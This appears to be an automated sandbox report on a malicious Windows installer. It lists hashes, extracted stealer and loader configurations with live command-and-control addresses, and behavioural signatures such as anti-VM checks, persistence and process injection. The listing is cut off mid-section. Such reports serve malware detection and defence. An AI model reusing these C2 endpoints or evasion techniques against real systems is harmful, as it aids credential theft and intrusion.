Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
781s -
max time network
1800s -
platform
windows10_x64 -
resource
win10-de-20210920 -
submitted
22-09-2021 10:40
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\7zS58A0.tmp\__data__\config.txt
ryuk
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
redline
janesam
65.108.20.195:6774
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4248 3724 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5388 3724 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6712 3724 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral8/memory/1244-247-0x00000000054A0000-0x00000000054BD000-memory.dmp family_redline behavioral8/memory/3700-332-0x0000000000B30000-0x0000000000B4F000-memory.dmp family_redline -
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19262b9e49ad.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19262b9e49ad.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 1016 created 3788 1016 WerFault.exe Sun19eb40faaaa9.exe PID 5832 created 4968 5832 WerFault.exe setup.exe PID 5816 created 1564 5816 WerFault.exe Sun19de8ff4b6aefeb8.exe -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral8/memory/3788-232-0x00000000009A0000-0x0000000000A74000-memory.dmp family_vidar behavioral8/memory/3788-233-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS471324A2\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS471324A2\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS471324A2\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS471324A2\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS471324A2\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS471324A2\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS471324A2\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 17 IoCs
Processes:
cmd.exepowershell.exeschtasks.exepowershell.execmd.exepowershell.execmd.exeschtasks.exerundll32.exeflow pid process 154 6176 cmd.exe 244 6452 powershell.exe 255 7688 schtasks.exe 257 2096 powershell.exe 266 6452 powershell.exe 270 2096 powershell.exe 272 7688 schtasks.exe 288 6452 powershell.exe 294 6452 powershell.exe 308 2208 cmd.exe 309 2208 cmd.exe 339 4512 powershell.exe 419 3656 cmd.exe 428 3656 cmd.exe 488 4532 schtasks.exe 489 4532 schtasks.exe 538 6396 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
98zXQtfds9_B8K1wkYwThy5h.exeGcleanerEU.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts 98zXQtfds9_B8K1wkYwThy5h.exe File opened for modification C:\Windows\system32\drivers\etc\hosts GcleanerEU.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSun19e4ade31b2a.exeSun193fda712d9f1.exeSun19262b9e49ad.exeSun1917b8fb5f09db8.exeSun1908b94df837b3158.exeSun191101c1aaa.exeSun19eb40faaaa9.exeSun198361825f4.exeSun19de8ff4b6aefeb8.exeSun1966fb31dd5a07.exeSun1905815e51282417.exeSun195a1614ec24e6a.exeSun1966fb31dd5a07.tmpLzmwAqmV.exeChrome 5.exePublicDwlBrowser1100.exe2.exeGcleanerEU.exesetup.exeudptest.exe5.exeLivelyScreenRecF18.exerundll32.exe3002.exejhuuee.exeConhost.exeBearVpn 3.exesetup_2.exesetup_2.tmpConhost.exeLzmwAqmV.exe3002.exeultramediaburner.exeultramediaburner.tmpKysholowapae.exeManeritaezho.exeUltraMediaBurner.exeinstaller.execmd.exeservices64.exeoffer.exeEnaxl.exeWyexnknyu.exeAtomic.exegcleaner.exeInstall.exeautosubplayer.exeInstall.exesihost64.exe5cyMyMfaTHF5mm4GGWje7aCw.exereg.exeUZE7zKuIOHTqCGibtYD11gl4.exeQSydSxCGLaGDRZ1oU1LJVgeo.exeschtasks.exeConhost.exeg4sLH6CA5afgxnFDnbN6julV.exejRMIx4HYZwNMhmRfA3bxVT31.exeConhost.exepowershell.exei_mtShrQKXhCFkurByO6l9wD.exenKgSrPTMItcaLsJo4r1XrMq6.exepid process 372 setup_installer.exe 4076 setup_install.exe 2392 Sun19e4ade31b2a.exe 3780 Sun193fda712d9f1.exe 1640 Sun19262b9e49ad.exe 3920 Sun1917b8fb5f09db8.exe 3496 Sun1908b94df837b3158.exe 3124 Sun191101c1aaa.exe 3788 Sun19eb40faaaa9.exe 2864 Sun198361825f4.exe 1564 Sun19de8ff4b6aefeb8.exe 2808 Sun1966fb31dd5a07.exe 1768 Sun1905815e51282417.exe 1244 Sun195a1614ec24e6a.exe 4312 Sun1966fb31dd5a07.tmp 4640 LzmwAqmV.exe 4796 Chrome 5.exe 4864 PublicDwlBrowser1100.exe 4916 2.exe 5056 GcleanerEU.exe 4968 setup.exe 3700 udptest.exe 3744 5.exe 1236 LivelyScreenRecF18.exe 4248 rundll32.exe 4608 3002.exe 4848 jhuuee.exe 2896 Conhost.exe 5004 BearVpn 3.exe 344 setup_2.exe 4840 setup_2.tmp 3888 Conhost.exe 4328 LzmwAqmV.exe 4928 3002.exe 5908 ultramediaburner.exe 5964 ultramediaburner.tmp 5980 Kysholowapae.exe 6068 Maneritaezho.exe 3556 UltraMediaBurner.exe 5056 GcleanerEU.exe 5792 installer.exe 6176 cmd.exe 6484 services64.exe 6616 offer.exe 6840 Enaxl.exe 6952 Wyexnknyu.exe 6972 Atomic.exe 7088 gcleaner.exe 3496 Install.exe 4268 autosubplayer.exe 6468 Install.exe 5524 sihost64.exe 7016 5cyMyMfaTHF5mm4GGWje7aCw.exe 1092 reg.exe 7140 UZE7zKuIOHTqCGibtYD11gl4.exe 4240 QSydSxCGLaGDRZ1oU1LJVgeo.exe 4532 schtasks.exe 908 Conhost.exe 5352 g4sLH6CA5afgxnFDnbN6julV.exe 6268 jRMIx4HYZwNMhmRfA3bxVT31.exe 2804 Conhost.exe 6452 powershell.exe 7172 i_mtShrQKXhCFkurByO6l9wD.exe 7184 nKgSrPTMItcaLsJo4r1XrMq6.exe -
Checks BIOS information in registry 2 TTPs 19 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
UZE7zKuIOHTqCGibtYD11gl4.exe210921.exerundll32.exemsSZ2vyO5kijQfy3iLE0ayRx.exeDone.exeInstall.exeA53F.exei_mtShrQKXhCFkurByO6l9wD.exeInstall.exeschtasks.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UZE7zKuIOHTqCGibtYD11gl4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion msSZ2vyO5kijQfy3iLE0ayRx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Done.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Done.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion msSZ2vyO5kijQfy3iLE0ayRx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UZE7zKuIOHTqCGibtYD11gl4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 210921.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion A53F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion A53F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion i_mtShrQKXhCFkurByO6l9wD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion i_mtShrQKXhCFkurByO6l9wD.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion schtasks.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrome.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wDmspnJ.exeabLzenc.exeWMIC.exeKysholowapae.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation wDmspnJ.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation abLzenc.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation WMIC.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Kysholowapae.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSun1966fb31dd5a07.tmpConhost.exesetup_2.tmprundll32.exerundll32.exeinstaller.exeMsiExec.exeautosubplayer.exerundll32.exeEnaxl.exereg.exel6unBCJnlLRYEZSAupPv3hRP.exeMsiExec.exereg.exerundll32.execmd.exeschtasks.exerundll32.exepid process 4076 setup_install.exe 4076 setup_install.exe 4076 setup_install.exe 4076 setup_install.exe 4076 setup_install.exe 4076 setup_install.exe 4312 Sun1966fb31dd5a07.tmp 2896 Conhost.exe 4840 setup_2.tmp 4212 rundll32.exe 5416 rundll32.exe 5792 installer.exe 5792 installer.exe 5792 installer.exe 7116 MsiExec.exe 7116 MsiExec.exe 4268 autosubplayer.exe 6744 rundll32.exe 6840 Enaxl.exe 6840 Enaxl.exe 6840 Enaxl.exe 5520 reg.exe 5520 reg.exe 5520 reg.exe 5520 reg.exe 5520 reg.exe 5520 reg.exe 4268 autosubplayer.exe 5520 reg.exe 5520 reg.exe 5520 reg.exe 5520 reg.exe 5792 installer.exe 5520 reg.exe 5520 reg.exe 4268 autosubplayer.exe 4268 autosubplayer.exe 7208 l6unBCJnlLRYEZSAupPv3hRP.exe 7732 MsiExec.exe 7732 MsiExec.exe 7732 MsiExec.exe 7732 MsiExec.exe 4268 autosubplayer.exe 7732 MsiExec.exe 7732 MsiExec.exe 7732 MsiExec.exe 1092 reg.exe 1092 reg.exe 6920 rundll32.exe 6920 rundll32.exe 5520 reg.exe 4268 autosubplayer.exe 4268 autosubplayer.exe 3656 cmd.exe 3656 cmd.exe 4268 autosubplayer.exe 4268 autosubplayer.exe 4268 autosubplayer.exe 4532 schtasks.exe 4532 schtasks.exe 4532 schtasks.exe 4532 schtasks.exe 4532 schtasks.exe 6396 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
GcleanerEU.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Peciviceme.exe\"" GcleanerEU.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\KasperskyLab chrome.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
msSZ2vyO5kijQfy3iLE0ayRx.exeDone.exe210921.exeA53F.exeWMIC.exeUZE7zKuIOHTqCGibtYD11gl4.exei_mtShrQKXhCFkurByO6l9wD.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA msSZ2vyO5kijQfy3iLE0ayRx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Done.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 210921.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA A53F.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WMIC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UZE7zKuIOHTqCGibtYD11gl4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA i_mtShrQKXhCFkurByO6l9wD.exe -
Drops Chrome extension 2 IoCs
Processes:
wDmspnJ.exeabLzenc.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json wDmspnJ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json abLzenc.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
wDmspnJ.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini wDmspnJ.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exedescription ioc process File opened (read-only) \??\L: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\M: installer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com 108 ipinfo.io 109 ipinfo.io 117 ip-api.com 285 ipinfo.io 286 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
B0A0.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 B0A0.exe -
Drops file in System32 directory 64 IoCs
Processes:
svchost.exewDmspnJ.exepowershell.exerundll32.exesvchost.exepowershell.exepowershell.exepowershell.exeforfiles.exeInstall.exeabLzenc.exeschtasks.exepowershell.exegpscript.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\gwJDJFSIw svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol forfiles.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache wDmspnJ.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{51C2619E-6BAC-4F16-BCD0-83AD14025AE1} svchost.exe File opened for modification C:\Windows\System32\Tasks\JoozO1 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\Tasks\gZokipixH svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat abLzenc.exe File opened for modification C:\Windows\System32\Tasks\gSzceyuEo svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log schtasks.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive gpscript.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\uZdEDCeaKQjVo2 svchost.exe File opened for modification C:\Windows\System32\Tasks\JFLQwz svchost.exe File opened for modification C:\Windows\System32\Tasks\OMsCZDeJImgVgl svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 7A201357966A7000 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\PvKMXtxeDKBRRtMew svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive schtasks.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent FDE6675885AC5B8B svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\spuInCFFcSJc svchost.exe File opened for modification C:\Windows\System32\Tasks\JnrJAucJILlcMMe2 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\bOoGaaDxESFbryPOAb svchost.exe File opened for modification C:\Windows\System32\Tasks\fHOlMGNmDutpzGekG svchost.exe File opened for modification C:\Windows\System32\Tasks\JnrJAucJILlcMMe svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wDmspnJ.exe File opened for modification C:\Windows\System32\Tasks\spuRERNvqitL svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini forfiles.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 wDmspnJ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_57E7943B1B053B0B26E4C58B8CC44AAE wDmspnJ.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
UZE7zKuIOHTqCGibtYD11gl4.exemsSZ2vyO5kijQfy3iLE0ayRx.exei_mtShrQKXhCFkurByO6l9wD.exeDone.exe210921.exeschtasks.exeA53F.exechrome.exepid process 7140 UZE7zKuIOHTqCGibtYD11gl4.exe 7224 msSZ2vyO5kijQfy3iLE0ayRx.exe 7172 i_mtShrQKXhCFkurByO6l9wD.exe 1440 Done.exe 7668 210921.exe 4532 schtasks.exe 4696 A53F.exe 4276 chrome.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Conhost.exesvchost.exeservices64.exeConhost.exedescription pid process target process PID 3888 set thread context of 4328 3888 Conhost.exe LzmwAqmV.exe PID 3916 set thread context of 1040 3916 svchost.exe svchost.exe PID 6484 set thread context of 7756 6484 services64.exe explorer.exe PID 2804 set thread context of 7836 2804 Conhost.exe chrome.exe -
Drops file in Program Files directory 64 IoCs
Processes:
